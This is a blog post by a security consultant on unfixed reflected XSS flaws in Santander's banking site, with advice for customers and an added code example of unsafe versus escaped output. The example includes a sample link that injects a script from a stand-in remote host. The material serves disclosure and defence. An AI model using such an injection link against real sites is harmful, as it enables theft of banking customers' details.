Paul Moore

I.T Security Consultant


Santander aren't secure - Should we bank online?

"Your financial protection is our priority and we take this very seriously" "Our service actively protects both your identity and your finances." "We take every step possible to keep your finances and personal details safe."

Confident statements; so you'd be forgiven for having equal confidence in their abilities to protect your information.

In November 2011, I contacted Santander to alert them to several security concerns which needed to be addressed.

Take the "online security" page for example.  It should look like this...

Unfortunately, the abundance of XSS (cross-site scripting) flaws throughout the site allows this...

Everything you see in red is fake... inserted from a remote site designed to collect user information.
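For site owners, the class of flaw described above comes down to a request value being echoed into the page without encoding. The following is an added example, not code from this article or from Santander's site: it shows an unsafe echo beside a hardened one that HTML-escapes the value and sends a Content-Security-Policy header. The function names, the `q` parameter and the `bank.example` / `collector.example` hosts are all hypothetical.

```javascript
// Added illustration. Every name here (renderUnsafe, renderSafe, the "q"
// parameter, bank.example, collector.example) is hypothetical.

const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Encode the five characters that can change HTML structure.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable form: the decoded URL value is concatenated into markup as-is,
// so any tags it carries become part of the genuine page.
function renderUnsafe(url) {
  const q = new URL(url).searchParams.get('q') || '';
  return `<p>No results for ${q}</p>`;
}

// Hardened form: the value is encoded on output, and the response carries a
// CSP so that, if an encoding step is missed elsewhere, the browser still
// refuses scripts and form posts that point at other origins.
function renderSafe(url) {
  const q = new URL(url).searchParams.get('q') || '';
  return {
    headers: {
      'Content-Security-Policy':
        "default-src 'self'; script-src 'self'; form-action 'self'",
    },
    body: `<p>No results for ${escapeHtml(q)}</p>`,
  };
}

// Constructed sample link: the parameter carries markup that references a
// remote host, which is what the screenshot above shows being pulled in.
const sampleLink = 'https://bank.example/search?q=' +
  encodeURIComponent('<script src="https://collector.example/c.js"></script>');

function demo() {
  return { unsafe: renderUnsafe(sampleLink), safe: renderSafe(sampleLink) };
}

console.log(demo());
```

In the unsafe output the remote script tag survives intact; in the safe output it is rendered as visible text and the header blocks off-origin scripts and form targets.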

Isn't this just another phishing scam?

This isn't a phishing scam at all, though fraudsters leverage aspects of a traditional phishing scam to profit from this type of exploit.  Traditional phishing scams consist of two things...

  1.  A fake email.
  2.  A fake website.

With anti-fraud software (Santander recommend Rapport) becoming more prevalent, phishing scams which rely on fake websites are harder to pull off.  This exploit allows us to modify the genuine site, making it much harder to spot as fraudulent.

Rapport for example, says everything is fine.

To be fair, Rapport was never designed to detect this kind of fraud... it just presumes (as we would) that the real site is 'secure'.

So, 10 months have passed (along with numerous emails back and forth with Santander's eCommerce security team) and it seems they're unable to fix this issue.

How can I protect myself from this type of scam?

Luckily, this exploit (known as "reflected XSS") still requires you to click a link containing a malicious payload... so avoid links in emails, Twitter feeds & Facebook posts which relate to a bank.  Always type the address you require directly into your browser's address bar.

Keep your anti-virus/anti-malware up to date.  Most applications look after their own updates, some do not.  Check it now!

Ironically, fake information can be used to reveal & defeat this type of scam.  A genuine site will be able to validate the information you provide, alerting you to any errors.  A fake site must presume your information is correct.  If you're still unsure - enter complete rubbish and see if the form submits.  If it does, chances are it's fake.
